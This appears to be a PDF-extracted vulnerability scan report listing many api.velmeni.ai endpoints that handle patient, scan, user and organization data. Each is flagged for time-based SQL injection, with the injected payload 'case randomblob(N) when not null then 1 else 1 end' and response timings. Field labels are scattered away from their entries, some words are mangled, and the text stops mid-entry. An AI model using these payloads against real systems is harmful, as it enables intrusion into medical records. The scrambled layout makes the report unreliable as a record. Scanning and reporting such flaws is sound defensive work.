Evidence	The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,181] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [251] milliseconds.
	The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,181] milliseconds, when the original unmodified guery with value

[VELMENI FOR DENTIST] took [251] milliseconds.

URL

https://api.velmeni.ai/api/patient/list_image_by_patient/137120?

source system=VELMENI FOR DENTIST

Method **GET**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [806] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,667] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [580] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [806] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,667] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [580] milliseconds.

URL https://api.velmeni.ai/api/analytics/add_medical_note

POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,013] milliseconds, when the original unmodified query with value [https://app.velmeni.ai/doctor/patients/10/1170/profile/39207/print_report] took [260]

milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,013] milliseconds, when the original unmodified query with value [https://app.velmeni.ai/doctor/patients/10/1170/profile/39207/print_report] took [260]

milliseconds.

URL https://api.velmeni.ai/api/analytics/add medical note

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,279] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,764] milliseconds, when the original unmodified query with value [1817]

took [771] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,279] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,764] milliseconds, when the original unmodified query with value [1817] took [771] milliseconds.

URL https://api.velmeni.ai/api/analytics/get_comparison_report

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,746] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,841] milliseconds, when the original unmodified query with

value [VELMENI FOR DENTIST] took [3,301] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,746] milliseconds,

Other Info

Evidence

Method

Evidence

Other Info

Evidence

Other Info

Attack

Evidence

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,841] milliseconds, when the original unmodified query with

value [VELMENI FOR DENTIST] took [3,301] milliseconds.

URL

https://api.velmeni.ai/api/analytics/logged in users

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [265] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [526] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [3,615] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [265] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [526] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [3,615] milliseconds.

URL

https://api.velmeni.ai/api/dental_robot/add_image

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [939] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,902] milliseconds, when the original unmodified query with value

[2000004998580] took [1,889] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [939] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,902] milliseconds, when the original unmodified query with value [2000004998580] took [1,889] milliseconds.

URL

https://api.velmeni.ai/api/dental_robot/add_image

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,129] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,744] milliseconds, when the original unmodified query with value [ritika] took [961] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,129] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,744] milliseconds, when the original unmodified query with value [ritika] took [961] milliseconds.

URL

https://api.velmeni.ai/api/dental robot/add image

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [959] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,942] milliseconds, when the original unmodified query with value [2022- 09-21] took [1,438] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [959] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,942] milliseconds, when the original unmodified query with value [2022- 09-21] took [1,438] milliseconds.

[1 / 139] mi

URL

https://api.velmeni.ai/api/dental_robot/add_image

Method

POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,523] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,793] milliseconds, when the original unmodified query with value [test5.

jpg] took [930] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,523] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,793] milliseconds, when the original unmodified query with value [test5.

jpg] took [930] milliseconds.

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,870] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,792] milliseconds, when the original unmodified query with value

[periapical] took [1,488] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,870] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,792] milliseconds, when the original unmodified query with value

[periapical] took [1,488] milliseconds.

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,804] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,226] milliseconds, when the original unmodified query with

value [xray] took [1,470] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,804] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which

caused the request to take [2,226] milliseconds, when the original unmodified query with

value [xray] took [1,470] milliseconds.

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,936] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,974] milliseconds, when the original unmodified query with value [105]

took [1,374] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,936] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,974] milliseconds, when the original unmodified query with value [105]

took [1,374] milliseconds.

URL https://api.velmeni.ai/api/dental_robot/add_image

Method POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,313] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,580] milliseconds, when the original unmodified query with value [3] took [1,047] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,313] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,580] milliseconds, when the original unmodified query with value [3] took [1,047] milliseconds.

URL

https://api.velmeni.ai/api/dental_robot/create_patients

Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [268] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [718] milliseconds, when the original unmodified query with value [Roy] took [822]

milliseconds.

POST

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [268] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [718] milliseconds, when the original unmodified query with value [Roy] took [822] milliseconds.

URL https://api.velmeni.ai/api/dental_robot/create_users

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,117] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,171] milliseconds, when the original unmodified query with value [India]

took [1,442] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,117] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,171] milliseconds, when the original unmodified query with value [India] took [1,442] milliseconds.

Other Info

URL

Evidence

https://api.velmeni.ai/api/dental robot/create users

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,897] milliseconds, when the original unmodified query with value [1] took

[266] milliseconds.

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,897] milliseconds, when the original unmodified query with value [1] took [266] milliseconds.

https://api.velmeni.ai/api/dental_robot/create_users

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter

Evidence

value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, when the original unmodified query with value [K] took [257] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [791] milliseconds, when the original unmodified guery with value [K] took [257] milliseconds.

URL

https://api.velmeni.ai/api/dental_robot/create_users

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [818] milliseconds, when the original unmodified query with value [K] took

[1,071] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [776] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [818] milliseconds, when the original unmodified query with value [K] took

[1,071] milliseconds.

URL

https://api.velmeni.ai/api/dental_robot/create_users

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [583] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [730] milliseconds, when the original unmodified query with value [DR1001]

took [1,162] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [583] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [730] milliseconds, when the original unmodified query with value [DR1001] took [1,162] milliseconds.

URL

https://api.velmeni.ai/api/dental robot/create users

Method

Evidence

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [954] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,696] milliseconds, when the original unmodified query with value

[xsdbghenjkrckagjebzmh] took [2,326] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [954] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,696] milliseconds, when the original unmodified query with value

[xsdbghenjkrckagjebzmh] took [2,326] milliseconds.

URL

https://api.velmeni.ai/api/dental robot/create users

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [451] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [1,047] milliseconds, when the original unmodified query with value

[VELMENI_FOR_DENTIST] took [260] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [451] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,047] milliseconds, when the original unmodified query with value [VELMENI_FOR_DENTIST] took [260] milliseconds.

URL https://api.velmeni.ai/api/organizations/add

POST Method

case randomblob(100000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [785] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,163] milliseconds, when the original unmodified guery with value

[test1004] took [255] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [785] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,163] milliseconds, when the original unmodified query with value

[test1004] took [255] milliseconds.

URL https://api.velmeni.ai/api/organizations/add

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [812] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,107] milliseconds, when the original unmodified guery with value

[VELMENI FOR DENTIST] took [253] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [812] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,107] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [253] milliseconds.

URL https://api.velmeni.ai/api/organizations/add

POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [304] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [595] milliseconds, when the original unmodified query with value [test 1234]

took [254] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [304] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [595] milliseconds, when the original unmodified query with value [test 1234]

took [254] milliseconds.

URL https://api.velmeni.ai/api/organizations/practice/add

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [771] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [786] milliseconds, when the original unmodified query with value [ds] took

[256] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [771] milliseconds, parameter

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

Info request to take [786] milliseconds, when the original unmodified query with value [ds] took

[256] milliseconds.

https://api.velmeni.ai/api/organizations/practice/add URL

Method **POST**

Evidence

Other Info

Method

Evidence

Other Info

Method

Evidence

Other Info

Evidence

Other

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [929] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [947] milliseconds, when the original unmodified query with value [test123]

took [771] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [929] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [947] milliseconds, when the original unmodified query with value [test123]

took [771] milliseconds.

URL https://api.velmeni.ai/api/organizations/save_features

Method **POST**

Evidence

Other

Info

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [939] milliseconds, when the original unmodified query with value

[patient_list_recent] took [259] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [939] milliseconds, when the original unmodified guery with value

[patient list recent] took [259] milliseconds.

URL https://api.velmeni.ai/api/organizations/save_features

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, when the original unmodified query with value [false] took [257]

milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [770] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, when the original unmodified query with value [false] took [257]

milliseconds.

URL https://api.velmeni.ai/api/organizations/save features

POST Method

Attack case randomblob(100000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,024] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,418] milliseconds, when the original unmodified query with

value [VELMENI FOR DENTIST] took [1,157] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,024] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [1,418] milliseconds, when the original unmodified query with

value [VELMENI FOR DENTIST] took [1,157] milliseconds.

URL https://api.velmeni.ai/api/patient/create

Other

Evidence

Info

Evidence

Other

Info

Evidence

Other Info

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [870] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [925] milliseconds, when the original unmodified query with value [female]

took [257] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [870] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [925] milliseconds, when the original unmodified query with value [female]

took [257] milliseconds.

URL https://api.velmeni.ai/api/patient/create

POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [767] milliseconds, when the original unmodified query with value [bansal]

took [1,449] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [760] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [767] milliseconds, when the original unmodified query with value [bansal]

took [1,449] milliseconds.

https://api.velmeni.ai/api/patient/get_s3_auth_urls?

source system=VELMENI FOR DENTIST

POST

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [695] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [822] milliseconds, when the original unmodified query with value [1] took

[1,180] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [695] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [822] milliseconds, when the original unmodified query with value [1] took

[1,180] milliseconds.

URL https://api.velmeni.ai/api/patient/list_by_appointment/1173

Method POST

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [1,334] milliseconds, when the original unmodified query with value

[VELMENI FOR DENTIST] took [1,022] milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [774] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to

take [1,334] milliseconds, when the original unmodified query with value [VELMENI FOR DENTIST] took [1,022] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/add?source_system=VELMENI_FOR_DENTIST

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

Evidence

Method

Other

Info

Evidence

Other Info

URL

Method

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [761] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,206] milliseconds, when the original unmodified query with value [] took [249] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [761] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,206] milliseconds, when the original unmodified query with value [] took [249] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/analyze/2202

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [255] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [756] milliseconds, when the original unmodified query with value [periapical] took [276] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [255] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [756] milliseconds, when the original unmodified query with value [periapical] took [276] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,399] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,516] milliseconds, when the original unmodified query with value [1224] took [374] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,399] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,516] milliseconds, when the original unmodified query with value [1224] took [374] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [781] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,794] milliseconds, when the original unmodified query with value [452] took [1,335] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [781] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [5,794] milliseconds, when the original unmodified query with value [452] took [1,335] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

Other

Info

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,513] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

request to take [2,390] milliseconds, when the original unmodified guery with value

[0.09743337333202362] took [1,320] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,513] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,390] milliseconds, when the original unmodified query with value [0.09743337333202362] took [1,320] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,766] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,691] milliseconds, when the original unmodified query with value

[0.9137791991233826] took [1,558] milliseconds.

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,766] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [6,691] milliseconds, when the original unmodified query with value [0.9137791991233826] took [1,558] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,238] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, when the original unmodified query with value

[Restoration Crown] took [758] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,238] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,536] milliseconds, when the original unmodified query with value

[Restoration Crown] took [758] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,311] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,396] milliseconds, when the original unmodified query with value [Dental

Caries] took [765] milliseconds.

Other

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,311] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,396] milliseconds, when the original unmodified query with value [Dental Caries] took [765] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,035] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,186] milliseconds, when the original unmodified query with value [Dental

Caries] took [2,111] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not

Other

Info

Evidence

Info

Evidence

Other Info

null then 1 else 1 end], which caused the request to take [1,035] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,186] milliseconds, when the original unmodified query with value [Dental Caries] took [2,111] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,266] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,607] milliseconds, when the original unmodified query with value [Dental

Caries] took [1,547] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,266] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,607] milliseconds, when the original unmodified query with value [Dental Caries] took [1,547] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,246] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,082] milliseconds, when the original unmodified query with

value [Dental Caries] took [1,278] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,246] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,082] milliseconds, when the original unmodified query with value [Dental Caries] took [1,278] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,600] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,624] milliseconds, when the original unmodified query with

value [Fixed Prosthesis] took [769] milliseconds.

Other Info

